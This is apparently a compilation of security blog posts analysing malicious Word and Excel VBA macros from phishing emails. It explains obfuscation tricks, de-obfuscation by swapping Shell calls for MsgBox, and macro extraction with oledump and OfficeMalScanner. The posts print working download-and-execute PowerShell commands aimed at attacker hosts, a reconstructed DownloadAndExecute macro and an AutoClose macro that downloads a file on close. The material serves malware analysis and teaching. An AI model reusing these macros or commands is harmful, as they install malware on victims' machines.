Understanding VBA from an Invoice Email

This malicious email contained a microsoft word attachment with VB code in it. Here is a link to the full original macro code.

SUBJECT: RECONFIRM INVOICE
ATTACHMENT: RECONFIRM INVOICE.doc


The code was interesting because it seemed amateurish in terms of it's obfuscation. Sure there were tons of random looking letters, variable names, etc. But in general, this was poorly obfuscated, if at all. Here are a few examples:


Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask

The above variable was used for doing bitwise masking of a string value, yet the attacker literally named it "HighMask" so you know exactly what it's used for.

Public Function Encode64(sString As String) As String

The above function literally performs base64 encoding of a string, so the name Encode64 makes sense and makes life simpler for the security researcher.

Public Sub Wipedir(pppppppppppppppppppppppppp As String)

The above function Wipredir calls the VBA deletefolder method in it, so again it's clearly deleting the evidence afterwards, thus the obfuscation here is poor.

So de-obfuscating this was quite simple then. One of the easier ways to quickly de-obfuscate VBA code like this is to put it into a word document, comment out the malicious lines, replace them with MsgBox statements, and execute the code, let the code do the work for you. For example:

Comment out this code with a tick

'MkDir (decryptString(Encode64(b)))

And replace it with this code

MsgBox ("MkDir=" + decryptString(Encode64(b)))



Comment out this code with a tick

'ChDrive (vEnd988888527)

And replace it with this code

MsgBox ("ChDrive=" + vEnd988888527)



Comment out this code with a tick

'Open vEnd3491963883 For Binary As vEnd1400215006

And replace it with this code

MsgBox ("OpenFile=" + vEnd3491963883)



Comment out this code with a tick

' OBsGG = Shell(vbHH, 1)

And replace it with this code

MsgBox ("Shell=" + vbHH)



Comment out this code with a tick

'OOO.deletefolder pppppppppppppppppppppppppp

And replace it with this code

MsgBox ("deletefolder=" + pppppppppppppppppppppppppp)



And like magic, you'll get a bunch of message boxes that tell you exactly what this code is trying to do. In this case
1.) Create a new folder C:\ProgramData\Memsys
2.) Navigate to that folder C:\ProgramData\Memsys
3.) Open and Write to a file C:\ProgramData\Memsys\ms.exe
4.) Execute that file from the command prompt C:\ProgramData\Memsys\ms.exe
5.) Delete that folder C:\ProgramData\Memsys


Of course always do this in a sandbox, not connected to the Internet, in case you accidentally execute malicious code that you didn't mean to and infect yourself.

More about neonprimetime

• neonprimetime pastebin
• neonprimetime virustotal
• @neonprimetime twitter
• neonprimetime reddit

Top Blogs of all-time

1. pagerank botnet sql injection walk-thru
2. DOM XSS 101 Walk-Through
3. An Invoice email and a Hot mess of Java

Top Github Contributions

1. Qualys Scantronitor 2.0

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Email Attachment Word Doc with VBA

I recently saw an email in French that was phishing a user to click on an invoice. The email looked like this below (I attempted to google translate to english also).

Subject: COPIE FACTURE + JUSTIFICATIFS
Subject: INVOICE COPY + SUPPORTING


Body:
Bonjour,
Ci-joint la copie de notre facture XXXXXXX du YYYYYYY de ZZZZZ avec ses justificatifs.
Dans lattente de son rglement,
Je vous remercie.


Body:
Hello,
Attached a copy of your invoice XXXXXXX of YYYYYYY from ZZZZZ with supporting.
Pending in its regulation,
Thank you,


The email had a 1997 old Microsoft Word attachment with a VBA script inside that contained this code. I thought I'd walk through and de-obfuscate some of the code for you.

Sub autoopen()


The VBA script, as seen above, will run as soon as the user opens the Word Document and if macros are enabled.

HNJVZn = 2468
Do While HNJVZn < 2468 + 10
    HNJVZn = HNJVZn + 1: DoEvents
Loop

In this VBA script there are probably 15 or so instances of do while loops like the one above. These are all useless obfuscation by the attacker meant to distract you from what's really going on. Each of these loops, if you were to de-obfuscate, essentially is doing nothing. It's kinda like a for loop that pauses the program for fractions of a second. You can see that the variable is set to 2468 and then incremented 1 time through each for loop for 10 times. Each time it's running the DoEvents function which is almost like the NoOp (no operations) function. Read here for more information on the VBA script DoEvents function.

Shell mmJhasvxjdUs.TextBox1 + mmJhasvxjdUs.TextBox2 + mmJhasvxjdUs.TextBox3 + mmJhasvxjdUs.TextBox4 + mmJhasvxjdUs.TextBox5 + mmJhasvxjdUs.TextBox6 + mmJhasvxjdUs.TextBox7 + mmJhasvxjdUs.TextBox8 + mmJhasvxjdUs.TextBox9 + mmJhasvxjdUs.TextBox10 + mmJhasvxjdUs.TextBox11 + mmJhasvxjdUs.TextBox12 + mmJhasvxjdUs.TextBox13, vbHide

So if we were to strip out all the useless do while loops mentioned above, this program then literally comes down to 1 single command, that's it. It's the VB Script Shell command. And as you can see, in the Microsoft Word document itself there must be 13 textboxes, each filled with a string value. This attacker is simply grabbing those 13 textbox values, concatenating them together, and running the command at the Shell Prompt of a hidden (vbHide) command shell prompt (cmd.exe). If I were to run the program "strings" or analyze the word document in another safe manner, I could quickly find out what the values in the textbox are. This is a nice method of obfuscation though for the attacker, to put the values in Textboxes, because automated Macro extraction tools like OfficeMalScanner for example are not going to by default extract for you the payload values, such as the command prompts executed, the urls detected, etc. since they're in GUI objects like textboxes. Here are the values I found.


Pow

erShell -NoExit -ExecutionPolicy bypa

ss -noprofile (New-Obje

ct System.Net.We

bClient).Downloa

dFile('

http://asp.councilldentalassociates.com/brodyaga/u312n/download.php

','%TEM

P%\arab.pif');Sta

rt-Process '%TEM

P%\arab.pif';



So if you concanate all those textbox values together you get the following command

PowerShell -NoExit -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://asp.councilldentalassociates.com/brodyaga/u312n/download.php','%TEMP%\arab.pif');
Start-Process '%TEMP%\arab.pif';


So from above you can see that this Microsoft Word document is executing a Powershell command. It's passing the NoExit parameter which means that after it executes the command it should leave the cmd.exe prompt open so that another command can be executed (in this case the Start-Process command would be next). The ExecutionPolicy of the powershell script is set to bypass which means nothing will be blocked and no prompts given, thus silently in the background to infect the user without their knowledge. The attacker also chooses the powershell noprofile option which allows the powershell prompt to be created and run the script and an empty untouched untainted shell. If they don't include this parameter, then all the user's custom scripts or corporate scripts would run first prior to this execution and the attacker's script might fail then because of some setting or dependency configured at startup. Finally the powershell script gets to the actual command to be executed, which is created a new WebClient object, which allows the victim's workstation to reach out over port 80 on the internet to the malicious url (the php link above), except this is no ordinary web page or php file, it's actually a binary file that will be downloaded and saved to the victim's temp folder as arab.pif. Finally, as mentioned earlier, that arab.pif file is executed (the equivalent of the user double-clicking it, except this happens behind the scenes with no user interaction). PIF files can contain hidden executable modules, for instance, BAT, EXE or COM programs that will be automatically executed after the host file is run, thus once this is executed the attacker has code execution on the workstation and you can consider it game over as there is probably some form of malware, ransomware, or other non-sense on this box. Time to re-image again.

More about neonprimetime

• neonprimetime pastebin
• neonprimetime virustotal
• @neonprimetime twitter
• neonprimetime reddit

Top Blogs of all-time

1. pagerank botnet sql injection walk-thru
2. DOM XSS 101 Walk-Through
3. php injection ali.txt walk-thru

Top Github Contributions

1. Qualys Scantronitor 2.0

Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.

De-Obfuscate URL from Evil VBA Macro

Here's a quick run-down of how I manually de-Obfuscated a URL from Evil VBA Macro.

First I was looking at this evil VBA Macro, but it's obfuscated and difficult to determine what it's doing. After crawling the VBA for a bit I noticed this line

Set jsonParseString = CreateObject(M_Zorro + "icrosoft" + dot_hero + "XMLHTTP")

Which looks like it's trying to create an Activex object to browse a url. A bit later I see this code.

jsonParseString.Open "G" + UCase(e_loadman) + "T", Redistribute(solov, 35), False
jsonParseString.Send

Which looks like they're going to Send a "GET" request with that XMLHTTP object to a website. Notice though the URL is obfuscated, it's just a function call Redistribute(solov, 35). So I look a little higher and see that 'solov' is an array of integers (probably representing characters in the url).

solov = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)

And then I see Redistribute is a function that likely converts those integers to the actual url.

Public Function Redistribute(Z() As Variant, oldLen As Integer) As String
  Dim n As Integer
  For n = LBound(Z) To UBound(Z)
   Redistribute = Redistribute & Chr(Z(n) - 8 * oldLen - 4444)
  Next n
End Function


Now I'm lazy, and I don't want to read or understand the evil code. I just want to "safely" run it. So I rip out only the necessary code. Rename a few variables so it makes more sense to me. Add a MsgBox to the end of the code. Drop it into an empty Microsoft Word document's Document_Open routine, and boom, I have my url.

  Dim oldLen As Integer
  oldLen = 35
  Dim decodeURLFunction As String
  Dim encodedUrl() As Variant
  encodedUrl = Array(4828, 4840, 4840, 4836, 4782, 4771, 4771, 4833, 4827, 4833, 4829, 4834, 4827, 4770, 4838, 4839, 4771, 4780, 4779, 4845, 4840, 4825, 4777, 4777, 4771, 4778, 4840, 4776, 4777, 4825, 4845, 4842, 4770, 4825, 4844, 4825)
  Dim n As Integer
  For n = LBound(encodedUrl) To UBound(encodedUrl)
   decodeURLFunction = decodeURLFunction & Chr(encodedUrl(n) - 8 * oldLen - 4444)
  Next n
  MsgBox decodeURLFunction




Of course always do this in a lab, a safe environment. Make sure the code you cut & paste doesn't contain calls to the actual ActiveX objects because then evil things may happen on your lab box. Instead just ensure it's a bunch of string concatenation, character conversions, etc. and then add a safe MsgBox to pop up a message box with your info you wanted.



Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Pull Macro out of XLS with oledump

I hope you're enjoying following my ride along as I learn sometimes new things, sometimes simpler better more efficient ways to do things. I previously blogged about extracting macros, and well I have stumbled across a quicker method. Didier again has a great tool, oledump.py which can make it really simple.

1.) See all the objects of an Office Doc (note "M" means macros are in that object)
oledump.py Test.xls

1: 107 '\x01CompObj'
2: 564 '\x05DocumentSummaryInformation'
3: 224 '\x05SummaryInformation'
4: 16529 'Workbook'
5: 525 '_VBA_PROJECT_CUR/PROJECT'
6: 104 '_VBA_PROJECT_CUR/PROJECTwm'
7: m 985 '_VBA_PROJECT_CUR/VBA/Sheet1'
8: m 985 '_VBA_PROJECT_CUR/VBA/Sheet2'
9: m 985 '_VBA_PROJECT_CUR/VBA/Sheet3'
10: M 2014 '_VBA_PROJECT_CUR/VBA/ThisWorkbook'
11: 2695 '_VBA_PROJECT_CUR/VBA/_VBA_PROJECT'
12: 1383 '_VBA_PROJECT_CUR/VBA/__SRP_0'
13: 114 '_VBA_PROJECT_CUR/VBA/__SRP_1'
14: 572 '_VBA_PROJECT_CUR/VBA/__SRP_2'
15: 140 '_VBA_PROJECT_CUR/VBA/__SRP_3'
16: 552 '_VBA_PROJECT_CUR/VBA/dir'


2.) EXTRACT THE MACRO from object #10
oledump.py -s 10 -v Test.xls

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
MsgBox ("Test")
End Sub


That was simple.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

De-Obfuscated Malicious VBA Macro

I posted an obfuscated malicious VBA script for in a Word Document that was disguised as a Resume in a phishing email.

It was obfuscated meaning that the attacker took time to randomize the code, change variables names and declarations to be confusing, add extra unnecessary code that just confuses you, etc.

I took the time then to de-obfuscate or turn it back into read-able code that a normal legit developer might write. Let's quickly attempt to review it.

#If Win64 Then
  Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
   (ByVal a As Long, ByVal b As String, _
   ByVal b As String, ByVal d As String, ByVal e As String, _
   ByVal f As Long) As Long
#Else
  Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" _
   (ByVal a As Long, ByVal b As String, _
   ByVal b As String, ByVal d As String, ByVal e As String, _
   ByVal f As Long) As Long
#End If


First, the above code declares a reference or gives the program a way to execute shell command line statements by declaring an alias for the shell32.dll's ShellExecuteA function. Now you can pass in the code you want to run and it will execute (assuming the user opening this document has access to do so).

Sub Document_Open()
  DownloadAndExecute
End Sub


Call a Function called 'DownloadAndExecute' that will run immediately when the Word document is opened (assuming Macros are enabled).

Sub DownloadAndExecute()


Declare that Function called 'DownloadAndExecute' so when the document opens it can be called.

  Dim PayloadUrl = "http://80.242.123.211:888/moist.exe"
  Dim maliciousFileLocation = Environ("tmp\df.exe")


Declare variables that store where I'm doing to download a file from and where I'm going to save it to/execute it from. Note this is only going to work if the user can access that website (Cross your fingers and hope that your internet filter/proxy blocks it) and that the user can save and execute files from the folder (likely yes since it's the a temp folder).

  Dim XMLHttpRequestObject = New MSXML2.XMLHTTP30
  XMLHttpRequestObject.Open "GET", PayloadUrl, False
  XMLHttpRequestObject.send


Make a call out to the Internet to download the malicious executable file using the XML Http Request object and an HTTP GET request.

  If XMLHttpRequestObject.Status = 200 Then


If the download was successful proceed to the next steps.

   Dim fileId = FreeFile
   Open maliciousFileLocation For Binary As #fileId
   Put #fileId, , XMLHttpRequestObject.responseBody
   Close #fileId
  End If


Save the results of the download to the location you specified earlier.

  ShellExecute 0, "open", maliciousFileLocation, "", vbNullString, vbNormalFocus
End Sub


Execute the file that you just downloaded and saved. Of course the goods are actually in that executable, so you'd want to download and analyze that file at some point as well.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Resume Phish with VBA Macro in Word

I pasted some details about a Phishing email that I saw containing a Resume in a Microsoft Word document. If users clicked on the word document it executed some malicious VBA scripts that attempted to download a file and infect the host workstation. What are the steps to determine all that?

First get a copy of the Word Document. If you have the email, great (skip to step 8). If you don't have the email but have a Wireshark packet capture, then try these steps ...

1.) Find the email SMTP traffic and right-click, Follow TCP Stream
2.) Save As RAW
3.) Open the file in Notepad++, it's probably Base 64 encoded (like the example below)


5.) Delete everything before and after so all you're left with the Base 64 encoded document, then Select it all


6.) Select Plugins => MIME Tools => Base 64 decode


7.) Now be careful since you have an active word document. You wouldn't want to accidentally click. That's why it's best to this in a disposable non-connected Virtual Machine. I wouldn't even save it as word, just save it as a TXT file still for now.


8.) Now use the OfficeMalScanner that I blogged about using here. And run this command that extracts a binary version of the macro
.\OfficeMalScanner.exe .\MaliciousWordDocument.txt inflate


9.) Now use the OfficeMalScanner to run this command to extract the actual VBA script
.\OfficeMalScanner.exe .\vbaProject.bin info


10.) Open that outputed file (VBAPROJECT.BIN-Macros\ThisDocument) in Notepad++ and boom! you have the code. Time for analysis.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Obfuscated Malicious VBA Macro

I recently blogged about attackers using the auto-close method in Microsoft Word VBA for attacks.

Today I pasted a sample of a malicious Microsoft Word document. If you review the VBA code you'll see that it's a bunch of random variables names, a bunch of calls to chrw, and one call to Shell.

chrw returns the character associated with the numeric character code.

Shell runs the command line code that is passed to it.

How does it work? When it creates a method called 'sdfsdfdsf' that is called when the Microsoft Word document gets closed.

Then it declares 6 variables ( GVhkjbjv + GYUUYIiii + hgFYyhhshu + GYiuudsuds + shdfihiof + doifhsoip )and in each variable it's appending 1 character at a time the malicious shell script it wants to run.

As an example, the first 4 characters in GVhkjbjv are 'c', 'm', 'd', and a space.

ChrW(49.5 + 49.5) & ChrW(54.5 + 54.5) & ChrW(50 + 50) & ChrW(16 + 16)

How did I know that?
ChrW(49.5 + 49.5) = ChrW(99) = 99 on the Ascii Table is the letter 'c'
ChrW(54.5 + 54.5) = ChrW(109) = 109 on the Ascii Table is the letter 'm'
ChrW(50 + 50) = ChrW(100) = 100 on the Ascii Table is the letter 'd'
ChrW(16 + 16) = ChrW(32) = 32 on the Ascii Table is the letter ' '


So if you follow that process through to the end you find
cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://193.26.217.203/jsaxo8u/g39b2cx.exe','%TEMP%\4543543.cab'); expand %TEMP%\4543543.cab %TEMP%\4543543.exe; start %TEMP%\4543543.exe;

If you're lazy (like me) and don't want to figure that out 1 character at a time, there are probably tools to fix that. Or just open a new word document, copy this code in, but replace the malicious Shell line

IUGuyguisdf = Shell(JHGUgisdc, 0)

with a message box

MsgBox(JHGUgisdc)



Happy hunting.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

It's not safe to Close Word Documents

Threatpost recently told us that the Dridex Malware has been seen using the AutoClose method in VBA.

First: What is the AutoClose function? This is a function in VBA (Visual Basic for Applications) that allows you to write code that will execute when a Microsoft Office document (Word, Excel, Powerpoint, etc.) is closed. A good legit example might be to prompt a user before they close to see if they want to run the spell-checker.

Second: Why is using AutoClose different than previous forms of malicious VBA? Because some malware detection detonation tools probably open malware, may even wait a period of time for code to execute, and might even attempt to trick malware into fast forwarding in time ... but I'm not sure how many also experiment with closing the document. I think most tools so far wait a period of time, and if nothing happens, the sandbox is closed and disposed of (without actually close the document). So if the malware doesn't run till document close, then many tools may miss it.

Third: I thought it'd be fun to see exactly what I'm talking about in action!

Let's forecast into the future quickly by showing you this harmless empty folder at c:\windows\temp\badstuff


Now let's start the magic. Here is my malicious, albeit harmless looking word document.


Let's say you got it in an email and you thought it was legit, so you opened it. You clicked the "Enable Content" (NOTE: This is not a good idea.) cause you were expecting something useful to show up. But instead you got nothing. The document did nothing. Looks pretty useless. (NOTE: Even if you were a malware reverse engineer, if you setup some monitoring or used some automated tool, you'd see that so far, the document has done nothing, no callouts, no file changes, no registry changes, nothing.)

Then if you're the user, you hit that harmless, never can hurt-you, easy to use Red X that closes the document.


You go on your merry way, thinking that was kinda stupid that you recieved that pointless empty word document.

Let's go back and look at that harmless empty folder c:\windows\temp\badstuff


OH SNAP! Where'd that come from?

Good thing I'm a good guy, and I'd never mean you any harm. But what if this word document wasn't from a nice guy. Looks like they somehow gained some very dangerous access to your computer. Can you trust anything on your PC anywhere? Probably not, better re-image and re-build it.

How did that happen? If you re-opened the word document and when to the Developer -> Visual Basic section under 'This Workbook', you'd see some code inside an 'AutoClose' function.


Sub AutoClose()
     Shell ("powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('http://neonprimetime.blogspot.com/2015/03/talking-thru-some-malware-in-microsoft.html','c:\windows\temp\badstuff\myfakemalware.txt')")
End Sub

Code like above can be modified to do whatever the attacker wants. Something more malicious than what I did. The snippet above simply downloads a file to your c:\ drive from an internet site. Imagine if in addition there was a command added to execute that file. Uh-oh, now we're in trouble.

Please don't open unexpected files from people you weren't expecting to send them. Microsoft Office documents cannot be trusted.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Extract a Macro from an Excel Doc

There are a few tools out there that extract Macros out of Microsoft Office Documents. I thought I'd walk through and example of how.

First let's create an excel document with a macro.

1.) First open Excel, select the Developer Tab, and the Visual Basic option


2.) Double-click in the VBA Project window on 'This workbook'


3.) Select the "Workbook" from the VBA code drop down list


4.) Write a Hello World type macro (Ex: MsgBox("Hello World") )


5.) Close out of the VBA code area


6.) Save the Excel doc as one of those old evil versions of Microsoft Office


Second let's extract the macro from the excel document without opening it

1.) Download one of the free Macro extraction software tools like OfficeMalScanner


2.) Run the extractor from the command line (Ex: OfficeMalScanner.exe C:\windows\temp\sample.xls info)


3.) See that it found something


4.) View the output folder


5.) Open the file 'ThisWorkbook' to see the macro code!




Now you're safe to analyze without opening and getting infected. Sweet.

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.

Talking Thru some Malware in a Microsoft Word VBA Macro

There was this phishy email

From: Forrest Chavez Carmella.7b@lepau.com
Subject: Outstanding invoices - 122680 January
Attachment: 122680.doc (MD5 Checksum cbfb453c2c43951ecbefc4eb6c20fb7f)


I posted a few more details here. Just by the looking at the sender (somebody I never knew, a domain name I've never heard of) I shouldn't have opened it. The Subject is trying to play on my emotions and get me to be upset that I have an open invoice, but I should know better and realize it's just a trick and never open it. Also the attachment is terribly named with some ugly numbers which should make me cautious as well.

But anyways, let's say I'm stupid and opened this phish. I thought I'd walk through what this is attempting to do. Inside the word document there is a VBA script (Visual Basic for Applications). If you have Macros enabled or click run Macro, then you can become the victim.

cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

• 1.) First you'll see ...
  
  cmd /K powershell.exe -ExecutionPolicy bypass -noprofile XXXXXXXCODEXXXXXXXX
  
      A.) 'cmd' is your friend command prompt
  
      B.) '/K' is a parameter being sent to 'cmd' telling it to run the upcoming command and keep the prompt open after it finishes
  
      C.) 'powershell.exe' is the command to run, and Powershell is your IT administrator's powerful little scripting prompt that gives them the ability to do anything that the User Interface could do but in a scripted fashion.
  
      D.) '-ExecutionPolicy bypass' is utilized because in general Powershell protects users from malicious scripts, but there are parameters you can pass to 'powershell.exe' that give it a 1-time bypass of those security restrictions and allows something malicious like this to run.
  
      E.) '-noprofile' is utilized to also try to bypass any tools your company may have running. By default you have a user profile and some scripts that generally run when you open powershell that your company sets up to keep you safe, secure, and make sure all your apps work properly. Using '-noprofile' bypasses those scripts and says just run my 1 evil script without anything else running first.
  
      F.) Finally we get to the Code, I abbreviated as XXXXXXXCODEXXXXXXXX , but I have more detail below in #2
  
  
• 2.) Second you'll the Powershell script code that tries to download the payload
  
  (New-Object System.Net.WebClient).DownloadFile('hxxp://62.76.41.15/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab')
  
      A.) '(New-Object System.Net.WebClient)' is the equivalent in a high level programming language like of declaring a new variable such as WebClient c = new WebClient(). You are basically creating a powerful object that will allow you to connect to the internet and perform operations.
  
      B.) '.DownloadFile(XXXURLXXX, XXXXLOCATIONXXXXX)' is a function you can call on that powerful WebClient object which makes the downloading and saving of a file as trivial as passing in the URL ( XXXURLXXX ) and the save location ( XXXXLOCATIONXXXXX ). The URL in this case ( hxxp://62.76.41.15/asalt/assa.exe ) contains the payload or the evil malware. This could be anything from a KeyLogger, to Ransomware, to anything under the sun. And it's saving it to '%TEMP%\JIOiodfhioIH.cab' , so the Windows Temp folder as a normal looking '.cab' file (generally used for things like Windows Updates, etc.).
• 3.) Third you'll see a command script trying to extract the contents of the CAB file
  
  'expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe;'
  
      A.) 'expand' is another windows command that gets run against 'cmd' that is able to extract the contents of a CAB file (CAB files are kinda like ZIP files)
• 4.) Fourth and finally you'll see a command script trying to execute an EXE
  
  'start %TEMP%\JIOiodfhioIH.exe;'
  
      A.) 'start' is another windows command that gets run against an 'exe' that came out of the CAB file. If this command succeeds, then the malware has been run and you're likely infected.

So in summary 1.) Get a phishy email 2.) Open the Word Doc 3.) The malicious VBA Macro runs inside 4.) It uses powershell to download a CAB file 5.) It uses 'expand' to extract the malware from the CAB file 6.) It uses 'start' to run the malware.

Boom, you're infected! If you want to prevent this, a good start would be not opening such evily suspicious looking emails :-)

Copyright © 2015, this post cannot be reproduced or retransmitted in any form without reference to the original post.